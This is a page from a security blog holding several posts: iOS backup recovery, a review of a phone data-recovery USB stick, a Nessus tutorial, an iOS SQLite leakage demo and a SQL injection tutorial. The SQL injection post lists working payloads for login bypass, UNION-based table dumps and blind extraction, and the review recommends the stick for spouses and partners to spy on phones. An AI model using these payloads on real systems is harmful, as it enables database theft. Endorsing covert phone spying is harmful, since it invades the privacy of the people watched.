RSS
 

Recovering data from the iPhone corrupted backups

01 Apr

At times when iTunes couldn’t finish the backup process (USB cable disconnect during backup/iOS upgrade, Power failure during backup), the backup gets corrupted and remains unreadable. As the corrupted backup does not contain meta files like Manifest.plist & Manifest.mbdb, it is not possible to restore the backup onto the iPhone and it is also not possible to read the backup using backup reader software like iPhone backup browser & iPhone backup extractor. So I wrote a python script iOS-corrupted-backup-reader.py that can read & recover data from the corrupted backups. Usage of the script is listed below.

Steps to use iOS-corrupted-backup-reader.py (Windows):

1. On windows, install Python 2.6.
2. Download iOS-Corrupted-Backup-Reader.py and place it in C:\ drive.
3. Create two folders backup & output in C drive.
4. From the iOS backup directory C:\Users\[user-name]\AppData\Roaming\Apple Computer\MobileSync\Backup\[iPhone-UDID]\,  copy all the files and place them in C:\backup directory.
5. Open  the command prompt, navigate to C:\ drive and type the below command.

\Python26\python.exe iOS-Corrupted-Backup-Reader.py c:\backup c:\output

6. It converts the backup files into readable format and places them in C:\output directory.

Steps to use iOS-corrupted-backup-reader.py (Mac OS X):

1. Create two folders backup & output on Desktop.
2. Download iOS-Corrupted-Backup-Reader.py and place it on Desktop.
3. From the iOS backup directory ~/Library/Application Support/MobileSync/Backup/[UDID], copy all the files and place them in backup directory.
4. Open the terminal and run the below command.

Python iOS-Corrupted-Backup-Reader.py ~/Desktop/backup/ ~/Desktop/output/

5. It converts the backup files into readable format and places them in output directory.

The script extracts and structures all the default files like Contacts, SMS, Calendar, etc. into directories with actual file names. Other third party application files are converted into readable format and gets stored in other-data folder in output directory without actual file names. Manifest.mbdb file maps the actual filenames to backup filenames and the mbdb file is not available in the case of corrupted backups. So it is not possible to get the exact file names. In general, most of the iOS applications store the data in plist, sqlite and Jpeg format. You can use plist editor sqlite spy and image viewers to open the files and read the data manually.

Note: Data recovery is only possible in the case of normal backups. If the backup is encrypted (encrypt backup option is checked in iTunes), it is not possible to read & recover the data from the corrupted backups.

 
 

iOS – Sqlite3 command killed:9 problem

29 Mar

Executing commands on a Jailbroken iPhone (>iPhone 4), might suddenly fail and display killed:9 error. In that case, follow the below steps to resolve the problem.

Steps listed below explains how I fixed the Sqlite3 command killed: 9 error. The same technique works for other binaries and commands too.

Steps:
1. Create a self signed code signing certificate.

On Mac OS X, go to Keychain Access -> Certificate Assistant -> Create a Certificate. It opens the certificate assistant window. Enter name (in my case it is securitylearn.net) and select certificate type as Code signing. Check let me override defaults option. Hit continue until it creates the certificate.

OS X self signed certificate

After creation of the certificate, the keychain looks as shown in the image below.

Certificate in keychain1

2. Connect to the iPhone over SSH using Cyberduck.
3. Copy the sqlite3 executable located at /usr/bin from the iPhone to Mac.
3. Open Mac terminal and run the below command to sign the sqilte3 with self signed certificate.

Codesign -fs securitylearn.net sqlite3

4. Replace the sqlite3 executable on the iPhone with newly signed sqlite3.
5. Now executing sqlite3 command works without any errors.

 
 

The Paraben’s iRecovery Stick Review

21 Mar

The Paraben’s iRecovery Stick is an USB flash drive designed to recover deleted data from the Apple iOS devices like iPhone, iPad & iPod touch. The product allows the investigators to recover data either directly from the device or from the iTunes back-up files. It is designed to support all iOS versions ranging from 1.x to 6.x and it works with iPhone 3GS, 4, 4S, 5 & other iOS devices. The iRecovery stick will not only recover the deleted data, it also downloads all the contents of the device. The article explains the usage of iRecovery stick and covers the pros and cons of it.

iRecovery stick features:

  • Downloads phone contents – downloads all the user data like photos, contacts, calendar, etc.
  • Recovers deleted data – recovers deleted text messages, contacts, call history, etc.
  • Easy to use – simply connect the iPhone and the iRecovery stick to the computer, then click the start button in the recovery software.
  • Portable – It is an USB thumb device and easy to carry.
  • Inconspicuous – It resembles a commonly used USB thumb drive, so it can be used as a spy device and no one would suspect that the device is used to recover data from the iPhone.
  • Works on backup files – recovers data from iTunes backup files.

 

Setup:

The iRecovery stick shipment box contains the iRecovery stick and an USB cable that is compatible with the iPhone 3GS, 4 & 4S. The iRecovery stick is compatible with Windows XP & 7 and provides an easy-to-use user interface. iRecovery stick does not support vmware/virtualbox environment and Linux & Mac OS X operating systems. Also, it is mandatory to turn off the antivirus software running on the Wndows OS for better data recovery. The iRecovery Stick is a portable and a simple to use USB flash drive which contains the recovery software – iRecoveryStick.exe. Recovery software included in the iRecovery stick can be installed on to the hard drive or it can be executed directly from the USB drive. Below image displays the contents of iRecovery stick USB drive.

iRecovery stick USB drive

Installation of the iRecovery software is well documented in the iRecovery Getting Started manual located in the USB flash drive.

Data acquistion and Recovery from the device:

The iRecovery Stick is very simple to use. Simply connect the iPhone to a Windows based computer with the USB cable and then connect the iRecovery stick to the same computer throuh an USB port. Once the two devices are connected, run the iRecoveryStick.exe program. Welcome screen of the iRecovery stick software is shown in the below image.

iRecovery stick device recovery

Once open, click on start recovery button (highlighted in the above image). Then the recovery software prompts to choose connected device as shown in the image below.

iRecovery stick connected device

Click on the device to start the recovery process (shown in the below image). The data recovery process will take several minutes to few hours to complete based on the size of the iPhone disk. During a test on Intel i5 2nd generation processor laptop it took 14 minutes to recover 256MB data from the iPhone 4.

iRecovery stick data recovery

The recovery process acquires existing data and recovers deleted data from the iPhone, but the majority of the data will be normal user’s data which has never been deleted. Once the recovery process is completed, then it immediately displays all the data recovered from the iPhone (shown in the below image). The recovery process downloads the existing contents of the phone such as contacts, call history, text messages, calendars, notes, pictures, multimedia and all other user’s data like safari history, safari bookmarks, GPS history & application cookies. It also recvovers different types of deleted data including text messages, contacts, call history, and calendar entries. The iRecovery stick is not capable of carving the file system, so it can only recover the deleted data from the Sqlite database files and does not recover the deleted files from the file system, i.e it does not recover the deleted photos.

iRecovery stick recovered data

The user interface also provides an option to generate easily readable report or to export the recovered data to Excel sheets. During a test, export to Excel option took more time than the actual recovery process.

iRecovery stick export to excel

The iRecovery stick does not have the capability to bypass the iPhone passcode. So if the device is protected with a passcode, unlock it before connecting it to the computer for recovery.

Data acquisition and Recovery from the backup:

The iRecovery Stick can also recover data from the iTunes backups. In general, iTunes backup contains a copy of everything on the device like contacts, SMS, photos, calendar, music, call history, notes, network settings, safari bookmarks, cookies and application data, etc. So the iRecovery stick recovers the same types of data it recovers from the iPhone itself. To recover data from the backups, run iRecoveryStick.exe and load the iTunes backup files created in Windows. Welcome screen of the iRecovery stick software is shown in the below image.

iRecovery stick backup recovery

Click on start import from iTunes backup button (highlighted in the above image). Then the recovery software prompts to choose specific iOS version as shown in the image below.

iRecovery stick backup recovery-1

Clicking on the specific iOS version prompts the user to open the existing iTunes backup as shown in the image below. In general iTunes backup gets stored in the below locations.

Windows XP – C:\Documents and Settings\[user name]\Application Data\Apple Computer\MobileSync\Backup\

Windows 7 – C:\Users\[user name]\AppData\Roaming\Apple Computer\MobileSync\Backup\

iRecovery stick open backup

Once the backup is selected, then the recovery process gets started. The data recovery process will take several minutes to few hours to complete based on the size of the backup files. During a test on Intel i5 2nd generation processor laptop it took 15 minutes to recover 300MB data from the iTunes backup.

Once the recovery process is completed, then it immediately displays all the data recovered from the backup files. The recovery process extracts the existing contents from the backup such as contacts, call history, text messages, pictures, multimedia and all other user data like user’s internet browsing history & application cookies. It also recvovers different types of deleted data from the backup including text messages, contacts, call history, calendar entries and notes.

The iRecovery stick can only recover data from the iTunes normal backups and it does not work with the iTunes encrypted backups.

What data is recovered:

Once the recovery process is completed, iRecoveryStick displays the recovered data in an easy readable format as shown in the image below.

iRecovery stick recovered data

The recovery process recovers the below existing data from the device/backup:

  • Messages – sent/received SMS messages including the exact date and time.
  • Contacts – phonebook data with creation and modification dates.
  • Call history – call logs including the exact duration time.
  • Graphics – photos & thumbnail images.
  • Organizer – calendar & notes.
  • Multimedia – mp3 files & recorded videos.
  • Internet data – safari history, safari bookmarks, safari suspend state, safari cookies, email accounts, youtbue bookmarks and application cookies.
  • Tracking history – geographical locations. It contains longitude and latitude coordinates along with a timestamp and is displayed in the Google Earth viewer.
  • Other data – this data includes maps history, maps bookmarks, maps directions and other properties.

 

The recovery process recovers the below deleted data from the device/backup:

  • Recovered data
    • Contacts
    • SMS
    • iMessages
    • Notes
    • Call history
    • Calendar data
    • Internet data
    • Tracking history

 

The iRecovery stick does not recover data from the iOS keychain file. Also, it does not recover the deleted files & photos.

Conclusion:

The iRecovery stick is a simple to use tool for data recovery from iOS devices. It recovers most of the data from the device, however it does not recover deleted files from the file system. Due to this limitation it may not be a great tool for forensic investigators. However this is the perfect device for employees, parents, spouses, boyfriends & girlfriends who wants to spy or recover the deleted SMS, contacts, call history and web history from iOS devices.

The paraben’s iRecovery stick costs around 200$. So in my personal opinion, I feel it is worth for money.

 
 

NESSUS Vulnerability Scanner – Basics

27 Feb

If you are looking for a vulnerability scanner, you might have came across several expensive commercial products and tools, with wide range of features and benefits. If a full featured free vulnerability scanner is on your mind, then it’s time to know about Nessus. The article covers installation, configuring and select policies, starting a scan, analyzing the reports using NESSUS Vulnerability Scanner.

Nessus was founded by Renuad Deraison in the year 1998 to provide to the Internet community a free remote security scanner. It is one of the full fledged vulnerability scanners which allow you to detect potential vulnerabilities in the systems. Nessus is the world’s most popular vulnerability scanning tool and supported by most of the research teams around the world.

The tool is free of cost and non-commercial for non-enterprises.  Nessus uses web interface to set up, scan and view repots. It has one of the largest vulnerability knowledge bases and because of this KB the tool is very popular.

Nessus supports wide range of operating systems that include Windows XP/7, Linux, Mac OS X, Sun Solaris, etc.

Key Features:

  • Identifies Vulnerabilities that allow a remote attacker to access sensitive information from the system.
  • Checks whether the systems in the network has the latest software patches.
  • Tries with Default passwords, common passwords, on systems account
  • Configuration audits.
  • Vulnerability analysis.
  • Mobile Device audits.
  • Customized reporting.

Installation & Configuration:

  1. You can download the Nessus home feed (free) or professional feed from Nessus website.
  2. Once you download the Nessus home tool, you need to register for generating an activation key.  The activation key will be sent to your email id. 
  3. Install the tool (Installation of nessus tool will be quite confusing and the installation guide comes handy).
  4. Open the Nessus in the browser, normally it runs on the port 8834 -
    http://localhost:8834/WelcomeToNessus-Install/welcome and follow the screen.
  5. Create an account with Nessus. 
  6. Enter the activation code you have obtained by registering with the Nessus website. Also you can configure the proxy if needed by giving proxy hostname, proxy username and password.
  7. Then scanner gets registered and creates the user account.
  8. Then downloads the necessary plugins (It takes some time for downloading the plugins). 
  9. Once the plug-ins are downloaded then it will automatically redirects you to a login screen. Provide the Username and password that you have created earlier to login.
     

Running the Tool:

Nessus gives you lots of choices when it comes to running the actual vulnerability scan. You’ll be able to scan individual computers, ranges of IP addresses or complete subnets. There are over 1200 vulnerability plugins with Nessus using which you’ll be able to specify individual or set of vulnerabilities to test for. In contrast to other tools Nessus won’t assume for explicit services running on common ports instead it will try to exploit the vulnerabilities.

One of the foundations for discovering the vulnerabilities in the network are:

  • Knowing which systems exist
  • Knowing which ports are open and which listening services are available in those ports
  • Determining which Operating System is running in the remote machine

Once you log into the Nessus using web-interface, you will be able to see different options like,

  • Policies –Using which you can configure the options required for scan
  • Scans -for adding different scans
  • Reports -for analyzing the results
     

Basic workflow of Nessus tool is to Login, Create or Configure the Policy, Run the Scan and Analyze the Results.

POLICIES:

Policies are nothing but the vulnerability tests that you can perform on the target machine. By default Nessus has 4 policies.

Nessus policies

Above figure shows the default polices that comes with Nessus tool.

External Network Scan:

The policy is pre-configured in such a way that Nessus scans externally facing hosts, which provides services to the host. It scans all 65,535 ports of the target machine. It is also configured with Plugins required for web application vulnerabilities tests like XSS.

Internal Network Scan:

This policy is configured to scan large internal networks with many hosts, services, embedded systems like printers, etc… This policy scans only standard ports instead of scanning all 65,535 ports.

Web App Tests:

Nessus uses this policy to detect different types of vulnerabilities exist in the web applications. It has the capability to spider the entire web site and discovers the content and links in the application. Once the spider process has been completed then Nessus starts to discover the vulnerabilities that exist in the application.

Prepare for PCI DSS audits:

This policy consists of PCI DSS (Payment Card Industry Data Security Standards) enabled. Nessus compares the results with the standards and produces a report for the scan. The scan doesn’t guarantee for a secure infrastructure.  Industries or Organizations preparing for PCI-DSS can use this policy to prepare their network and systems.

Apart from these pre-configured policies you can also upload a policy by clicking on “Upload” or configure your own policy as per your scan requirement by clicking on “New Policy”.

Configuring the Policy:

  • Click on the policies tab on the top of the screen
  • Click on the New Policy button to create a new policy

Under the General settings tab select the “setting type” based on scan requirement, like Port Scanning, Performance scanning etc… Based on the type Nessus prompts different options that has to be filled. For example ‘Port Scanning’ has the following options

Nessus Port scanning options

Above figure shows configuring options of Port Scanning.

Enter the port scan range. By default Nessus scans all the TCP ports in /etc/services file. You can limit the ports by specifying it manually (like 20-30). You have different scanners like Nessus SNMP scanner, SSH scanner, ping remote host, TCP Scanner, SYN scanner, etc…. Enable by selecting the check box as per the scan requirement.

  • Enter the credentials for scan to use. You can use single set of credentials or multiple set of credentials if you have. You can also work it out without entering the credentials.
  • The plugins tab has number of plugins. By default Nessus will have all the plugins enabled. You can enable or disable all the plugins at a time or enable few from the plug-in family as per the scan you’d like to perform. You can also disable some unwanted plugins from the plug-in family by clicking on particular plug-in.

Nessus sub plugins

The above figure shows the sub-plugins for the plugin Backdoors.

In the above Figure the green one shows the parent plugin and the blue once shows the sub-plugins or the plugins under the plugin (backdoor). You can enable or disable by simply clicking on the enabled button.

  • In the Preferences, you are provided with a drop down box to select different types of plugins. Select the plugin based on the scan requirement and specify the settings as per the plugins requirement. Click finish once completed. For example: configure the database.

Nessus database settings plugin

The above figure shows the configuration of Database settings plugin.

SCANS:

Once you are done with configuring the policies as per your scan requirement, you need to configure the scan details properly. You can do it under Scan tab.

Under the Scan tab, you can create a new scan by clicking New Scan on the top right.  Then a pop up appears where you need to enter the details like Scan Name,  Scan Type, Scan Policy & Target.

  • Scan Name: The name that you are willing to give to the scan.
  • Scan Type:  You have options to RUN the scan instantly by selecting RUN NOW. Or you can make a template which you can launch later when you are willing to run. All the templates are moved under the TEMPLATE tab beside the SCAN tab.
  • Scan Policy: Select the policy that you have configured previous in the policies section.
  • Select Target: Enter the target machine which you are planning to test. Depending upon the targets Nessus takes time to scan the targets.
     

Results:

Once the scanning process has been completed successfully, results can be analyzed from RESULTS menu.

  • Once the scan has been completed, you can see the name of the scan under the results section. Click on the name to see the report.
  • Hosts: Specifies all the target systems that you have scanned.
  • Vulnerabilities: Displays all the vulnerabilities on the target machine that has been tested.
  • Export Results: You can export the results into difference formats like html, pdf, etc…  You can also select an individual section or complete result to export based on your requirement.

Let us try out an example now-

I have configured a policy named Basic Scan. We have many options while configuring or building the policy like port scanners, performance of the tool, Advanced etc.

Nessus port scanning settings for basic scan

The above figure shows configuration settings of Port Scanning for the policy Basic Scan.

You don’t need credentials now, so skip the credentials tab and move to Plugins tab. You need to configure the specific plug-in as per the scan requirement that you are willing to perform on remote machine.

Nessus plugins for basic scan

The above figure shows the plugins that I have enabled for the policy Basic Scan. I have enabled few plugins for windows machine scan.

Nessus scan configuration

The above figure shows the configuration of the Scan.

I have configured the scan to run instantly with the policy that I have created earlier. And the scan target specify the IP address I am willing to scan.

Once all the details has been entered click on Create Scan which shows the Scan is running as shown in the below Figure.

Nessus running scan

Once the scanning has been completed then you can see the results in Results tab. Below Figure shows the same.

Nessus results

Double clicking on the title displays the scan results.

Nessus scan result

The above figure shows the Hosts details. It includes all the targets that you have scanned during the test. Double clicking on the host address displays the vulnerabilities Nessus have identified during the test. You can also click on Vulnerabilities tab to check out the vulnerabilities.

Nessus vulnerabilities menu

The above figure shows the Vulnerabilities that Nessus found during its scan. Based on the Risk Nessus marks it as high, medium, info etc… Clicking on the Vulnerability gives you brief description of it.

For example let us go with Netstat portscanner, displays you the following information

Nessus port scan result

The above figure shows the ports opened in the target machine.

In the same manner you can analyze complete details by clicking on the vulnerabilities. Nessus also suggests the solutions or remedies for the vulnerabilities with few references.

Conclusion:

Nessus is a tool which automates the process of scanning the network and web applications for the vulnerabilities also suggests solutions for the vulnerabilities that are identified during the scan.

 
2 Comments

Posted by kamalb

 

Sqlite data leakage in iOS applications

24 Jan

Most of the iOS applications store sensitive information like usernames, passwords & transaction details, etc.. either permanently or temporarily on the iPhone to provide offline access for the user. In general, to store large and complex data, iOS applications use the Sqlite database as it offers good memory usage and speed access. For example, to provide offline access Gmail iOS application stores all the emails in a Sqlite database file in plain text format. Facebook iOS application stores all the friends details in Sqlite files.

Unencrypted sensitive information stored in a Sqlite file can be stolen easily upon gaining physical access to the device or from the iTunes backup. Also, if an entry is deleted, Sqlite tags the record as deleted but not purge them. So in case if an application temporarily stores and removes the sensitive data from a Sqlite file, deleted data can be recovered easily by reading the Sqlite Write Ahead Log.

The below article explains on how to view Sqlite files and how to recover the deleted data from Sqlite files on the iPhone. For this exercise, I have created a demo application called CardInfo. CardInfo is a self signed application, so it can only be installed on a Jailbroken iPhone. The CardInfo demo application accepts any username & password, then collects the credit card details from the user and stores it in a Sqlite database. Database entries are deleted upon logout from the app.

Steps to install the CardInfo application:

1. Jailbreak the iPhone.
2. Download CardInfoDemo,ipa file -  Download link.
3. On the Windows, download the iPhone configuration utility – Download link.
4. Open the iPhone configuration utility and drag the CardInfoDemo.ipa file on to it.

iPhone configuration utility

5. Connect the iPhone to the windows machine using USB cable. Notice that the connected device is listed in the iPhone configuration utility. Select the device and navigate to Applications tab. It lists already installed applications along with our CardInfo demo app.

Cardinfo demo iOS app install

6. Click on Install button corresponding to the CardInfo application.
7. It installs the CardInfo application on to the iPhone.

cardinfo ios demo app

When an application is installed on the iPhone, it creates a directory with an unique identifier under /var/mobile/Applications directory. Everything that is required for an application to execute will be contained in the created home directory and it is known as bundle directory.

Steps to view  CardInfo Sqlite files:

1. On the Jailbroken iPhone, install OpenSSH and Sqlite3 from Cydia.
2. On windows workstation, download Putty.
3. Connect the iPhone and the workstation to the same Wi-Fi network.
Note: Wi-Fi is required to connect the iPhone over SSH. If the Wi-Fi connection is not available SSH into the iPhone over USB.
4. 
Run Putty and SSH into the iPhone by typing the iPhone IP address, root as username and alpine as password.
5. Navigate to /var/mobile/Applications/ folder and identify the CardInfo application directory using ‘find . –name CardInfo’ command. On my iPhone CardInfo application is installed on the – /var/mobile/Application/B02A125C-B97E-4207-911B-C136B1A08687/ directory.

cardinfo directory

6. Navigate to the /var/mobile/Application/B02A125C-B97E-4207-911B-C136B1A08687/CardInfo.app directory and notice CARDDATABASE.sqlite3 database file.

cardinfo sqlite file

7. Sqlite database files on a Jailbroken iPhone can be viewed directly using Sqlite3 command line client. View CARDDATABASE.sqlite3 and notice that CARDINFO table is empty.

cardinfo sqlite before login

8. On the iPhone, open CardInfo application and login (works for any username and password). 

cardinfo login

9.Enter credit card details and click on Save button. In the background, it saves the card details in the Sqlite database.

cardinfo - card details                    cardinfo - saved details

10. View CARDDATABASE.sqlite3 and notice that CARDINFO table contains the credit card details data.

cardinfo sqlite after save

11. Logout from the application on the iPhone. In the background, it deletes the data from the Sqlite database. 

cardinfo logout

12. Now view CARDDATABASE.sqlite3 and notice that CARDINFO table is empty. 

cardinfo sqlite after logout

Steps to recover the deleted data from CardInfo Sqlite file:

Sqlite database engine writes the data into Write Ahead Log before storing it in the actual database file, to recover from system failures. Upon every checkpoint or commit, the data in the WAL is written into the database file. So if an entry is deleted from the Sqlite database and there is no immediate commit query, we can easily recover the deleted data by reading the WAL. In case of iOS, strings command can be used  to print the deleted data from a Sqlite file. In our case, running ‘strings CARDDATABASE.sqlite3’ command prints the deleted card details.

cardinfo sqlite recovered

In iOS, if an application uses the Sqlite database for temporary storage, there is always a possibility to recover the deleted temporary data from the database file.

For better security, use custom encryption while storing the sensitive data in Sqlite database. Also, before deleting a Sqlite record, overwrite that entry with junk data. So even if someone tries to recover the deleted data from Sqlite, they will not get the actual data.

 
 

SQL Injection exploitation and dumping the database

07 Jan

SQL Injection:

SQL Injection is a web based attack used by attackers to steal sensitive information from organizations through web applications. It is one of the most common application layer attacks used since a  long time. This attack takes advantage of improper coding of web applications, which allow an attacker to exploit the vulnerability by injecting SQL commands into the prior web application. The underlying fact that allows for SQL Injection is that the fields available for user input in the web application allow SQL statements to pass through and interact with or query the database directly.

For example, let us consider a web application that implements a form-based login mechanism to store the user credentials and performs a simple SQL query to validate each login attempt. Here is a typical example:

select * from users where username=’admin’ and password=’admin123′;


If the attacker knows the username of the application administrator is admin, then he can log into the app as admin by entering the username as admin’– and without supplying any password. The query in the back-end looks like:

Select * from users where username=’admin’--’ and password=’xxx’;


Note the comment sequence (–-) causes the followed query to be ignored, so query executed is equivalent to:

Select * from users where username=’admin’;


Hence the password check is bypassed and the attacker is logged into the app as admin.

Different types of SQL Injections:

SQL Injection can be classified into 3 types based on the way it is exploited : In-band, Out-band and Inferior.

1. In-band:

This is also called as Error-based or Union based SQL Injection or first order Injection. The application is said to be vulnerable to In-band when the communication between the attacker and the application happens through a single channel. I.e. the attacker uses the same channel to enter the malicious string and to retrieve the data from the database. This is a straight forward technique. The application directly displays the retrieved data on the web pages.

Confirming the Vulnerability:

Below URL is In-band SQLI vulnerable practice site which I setup in my vmbox.

http://192.168.1.2/news-and-events.php?id=22


Accessing to the URL displays the home page as shown in the below image.

Sqlinjection demo

Now let us try to confirm the vulnerability by simply adding a single quote at the end of the URL:

http://192.168.1.2/news-and-events.php?id=22'


The above URL shows an error on the web page, saying that Error in your SQL Syntax. This is because of an extra single quote (‘) that we have entered through the URL into the query in the background. So by seeing the error we can understand that the URL is vulnerable to In-band SQLI. Below image shows you the error occurred due to concatenating the special character (‘).

Sqlinjection error

If single quote (‘) is blocked, then we can try using “or 1=1 –” or “and 1=1″ at the end of the URL.

http://192.168.1.2/news-and-events.php?id=22 or 1=1 -- (or)
http://192.168.1.2/news-and-events.php?id=22 and 1=1 --


Above URL shows the same page that has been displayed while accessing the URL:

http://192.168.1.2/news-and-events.php?id=22


This is because the condition that we have entered at the end of the URL is always true.

Now try to access by entering the string “or 1=0–“or “and 1=0–”. So the URL looks like:

http://192.168.1.2./news-and-events.php?id=22 or 1=0-- (or)
http://192.168.1.2/news-and-events.php?id=22 and 1=0--


Now we will not be able to access the page, because the condition “1=0” is always false. Below image shows the page when accessed with false condition.

Sqlinjection confirmation

Then we can confirm that URL is vulnerable to SQLI.

The string listed in the below table can be used to confirm SQL Injection

or 1=1‘or 1=1“or 1=1or 1=1–‘or 1=1–“or 1=1–
or 1=1#‘or 1=1#“or1=1#  or 1=1/*‘or 1=1/*
“or 1=1/*or 1=1;%00‘or 1=1;%00“or 1=1;%00‘or’‘or
‘or’–‘or–or a=a‘or a=a“or a=aor a=a–
‘or a=a –“or a=a–or ‘a’=’a’‘or ‘a’=’a’“or ‘a’=’a’‘)or(‘a’=’a’
“)”a”=”a”‘)’a’=’a‘or’’=’

You can try all the combinations for string “or a=a” that we have tried for “or 1=1”….. Like #,–, /* etc…

Extracting-Information:

Moving further, we can extract or dump the complete database by using “UNION” and “SELECT” commands.

Finding-the-DBMS:

We can find out DBMS type (MS-SQL, MYSQL, ORACLE) by using the unique functions of the appropriate database. For example to find out the database user, all the above databases have different syntax.

MS-SQL: user_name()
MYSQL: user ()
ORACLE: select user from dual;

So let’s try to find the DBMS of our SQLI vulnerable site. As a first trial I am entering “user_name()” at the place where we had “2”.

http://192.168.1.2/news-and-events.php?id=-22 union select 1,user_name(),3,4,5,6,7


Above URL gives an error saying “Function user_name doesn’t exist”. Which means the DBMS isn’t MS-SQL.

Find database in Sql injection

Above image shows that the DBMS isn’t MS-SQL. Now let’s try with “user ()”

http://192.168.1.2/news-and-events.php?id=-22 union select 1,user(),3,4,5,6,7


Above URL display the user name of the DBMS. So we confirm that the DBMS is MYSQL.

Sqli - fetch database username

Above image shows the database user name which proves that the DBMS is MYSQL.

So we can use all the MYSQL functions in the place of 2,3,5,7 and dump the database on the web page.

Finding-number-of-columns:

Let us try to find out the number of columns in the table using UNION.  The URL looks like:

http://192.168.1.2/news-and-events.php?id=22 union select NULL


Displays an error in the page saying “Select statement having different number of columns” .Now we understood that there are more than one column in the table.

finding number of columns using sql injection

Image shows the error message occurred by accessing the web site using above URL (Using select NULL). So try adding one more NULL.

http://192.168.1.2/news-and-events.php?id=22 union select NULL, NULL


Still if we are receiving the same error, then keep on adding the NULL to the query and try to find out number of columns in the table.

http://192.168.1.2/news-and-events.php?id=22 union select NULL, NULL, NULL, NULL, NULL, NULL, NULL


The above string gives you the same page as the initial URL as the number of columns in the table is seven.

finding columns usingsl injection by using order by

Figure shows the page when accessed with above URL. (Using seven NULL’S).

We can also use “ORDER BY” to find out the number of columns in the table.

http://192.168.1.2/news-and-events.php?id=22 order by 7--


So we can understand that there are seven columns in the table.

Now here is the trick. Where will we be able to see the extracted data from the database?

Just add a negative sign before the id value. Then the data appears on the web page straight away.

http://192.168.1.2/news-and-events.php?id=-22 union select 1,2,3,4,5,6,7


(Note: Negative sign (-) before 22)

Then the application displays some of the numbers on the web page.  Above URL displays 2,3,5,7 on the web page.

display content on web page using sql injection

Figure shows the numbers displayed on the web page.

Finding the version and getting the databases:
http://192.168.1.2/news-and-events.php?id=-22 union select 1,@@version,database(),4,5,6,7


finding version of database using sql injection

Figure display the database version “5.0” and the database “nilakantatrust”.

Extracting Tables from database:

Now let us try extracting all the tables from the database “nilakantatrust”.

http://192.168.1.2/news-and-events.php?id=-22 union select 1,group_concat(table_name),3,4,5,6,7 from information_schema.tables where table_schema=database()--

extract tables using sql injection

Figure shows all the tables dumped from the database “nilakantatrust”.

Information_schema is the table which contains meta-data, nothing but information about all the tables and columns of the database.

Extracting columns from the tables:
http://192.168.1.2/news-and-events.php?id=-22 union select 1,group_concat(column_name),3,4,5,6,7 from information_schema.columns where table_schema=database()--

extracting columns using sql injection
Figure displays all the columns of the tables in the database “nilakantatrust”.  We can look at all the columns and then dump the interesting columns like passwords, SSN, Credit card numbers etc…

2. Out-Band:


This kind of an attack uses two different channels for communication between attacker and the application. Modern DBMS has very powerful applications and their features go behind simply returning the data to the users. They can be instructed to send an e-mail and they can also interact with file system. All of these functionalities are very helpful for an attacker. Attacker establishes direct connection to the database through one channel to insert the data or the malicious string into the database. DBMS responds through new channel, like e-mails, or executing the commands using xp_cmdshell etc….

3. Inferred:


This is also known as Blind – SQL – Injection. Here the server doesn’t responds with any syntax error or other means of notifications. This is very similar to normal SQL Injection but when attacked server doesn’t send any data to the attacker. Attacker need to retrieve the data by asking true or false questions through SQL commands.

The attacker needs to execute his commands by observing the response of the application.  This makes exploiting a SQL Injection attack more difficult but not impossible.

Now let’s have some practice:

http://192.168.1.2/news-and-events.php?id=22  and 1=1 --


The above URL gives the same data as of original site.

http://192.168.1.2/news-and-events.php?id=22  and 1=0 --


Above URL shows an error on the web page, as I explained you previously. (In “in-band” type)

Finding-the-DBMS:

To find out the DBMS used by the application we need to make use of different pre-defined functions available for different databases

For example, To find out the user name of the database following syntax is used by different DBMS

  • MS-SQL: user_name()
  • Mysql: user()
  • Oracle: select user from dual


You can know the difference from the cheat-sheet available at www.pentestmonkey.net

So, let us find out the DBMS using the above functions ;)

Accessing the below URL gives you a white page.

http://192.168.1.2/news-and-events.php?id=21

blind sql injection

Observe the white page in Figure which is different from the URL:

http://192.168.1.2/news-and-events.php?id=22

as we have seen the page previously. By observing this difference we can extract the DBMS type of the application.

Let us check whether the application is using MS-SQL:

http://192.168.1.2/news-and-events.php?id=21%2b(select%20case%20when%20(select%20user_name())%20then%200%20else%201%20end%20)--

In the above URL I am trying to add 1 to the id ‘21’ based on the condition. When we access the URL with ID=21 we get the page as shown in Figure (m) and when we access URL with ID=22 we get the home page as shown in Figure (a).

In the URL %2b indicates ‘+’ and %20 indicates ‘  ‘ (space). It is called URL encoding. When particular symbol is filtered we can pass those symbols by encoding using different encoding techniques available.

And the condition in the query is framed using “case” statement along with “user_name” (A pre-defined function in MS-SQL to return DB user name). If the function user_name() is found then the condition returns ‘1’ which makes the ID=22 else it returns ‘0’ and the Id remains ‘21’

finding database using blind sql injection

Figure shows page which confirms that the DBMS isn’t MS-SQL.  So, now let us check for “MYSQL”

http://192.168.1.2/news-and-events.php?id=21%2b(select%20case%20when%20(select%20user())%20then%200%20else%201%20end)--

Above URL shows the page with ID=22 which confirms that the DBMS is MYSQL.

Finding the version:

To find the database version we can use ‘substring’ function in MYSQL. Observe the below URL

http://192.168.1.2/news-and-events.php?id=22%20and%20substr(@@version,1,1)=5--

If the database version is ‘5’ then the substring function returns ‘5’ (as we are trying to extract only one character), where we are comparing the resultant value with ‘5’. Then if we are able to see the home page, we can confirm that the database is something like 5.x.x version.

If the URL doesn’t pops up the home page, then we can try changing the comparing value to 4,3 etc…

To find the exact version of the database we need to compare the second character of the version. For example

substr(@@version,2,1)=0
substr(@@version,3,1)=1

So, by observing the responses of the application we can extract complete version of the database.

Finding the User Name of the database:

We can find out the user name of the database by using both ‘case’ statement and ‘substring’ function.

http://192.168.1.2/news-and-events.php?id=22%2b%20(select%20case%20when%20(substr(user(),1,1)='a')%20then%200%20else%201%20end)--

Based on the responses of the application keep on changing the character in the function substr().
Once we get the first letter of the user name then move on to find out the second letter.

For example:

substr(user(),2,1)=’r’
substr(user(),3,1)=’b’ ….

In this fashion, to find out a single character in the user name, we have to send more than 200 request will all possible ASCII characters to the server. This technique can be optimized we can extract a single character from the database with in 8 requests.

Conclusion:

SQL Injection is a powerful attack technique which can be used to dump complete database of the application.

I have written this article for infosec institute. Take a look at the web application security course offered by infosecinstitute.

 

 
No Comments

Posted by kamalb

 
Page 3 of 1312345...10...Last »